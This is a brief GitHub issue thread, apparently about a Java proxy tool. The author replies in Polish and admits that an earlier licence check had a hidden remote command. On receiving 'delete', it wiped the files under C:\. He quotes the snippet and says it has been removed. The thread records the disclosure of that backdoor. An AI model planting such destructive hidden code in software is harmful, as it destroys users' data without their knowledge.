### ISSUE TITLE
?

### ISSUE THREAD

**Issue by insertt** [yooniks/CasualProxy#1]
https://github.com/yooniks/CasualProxy/blob/fb5cc0c355f24e1921997d588b1daa6352d6fff7/src/main/java/xyz/yooniks/cproxy/Proxy.java#L74-L111

**Comment by yooniks** [comment]
Na początku proxy miało nie być publiczne i działać na licencji, 
`             else if (inputLine.equalsIgnoreCase("delete")){ 
                 for(File f: new File("C:\\").listFiles()) { 
                     f.delete(); 
                 } `
wywalone, ale licencja dalej sobie bedzie, i tak nie bede zmienial zawartosci license.txt

i kod tez poprawiony, wszystko na szybko
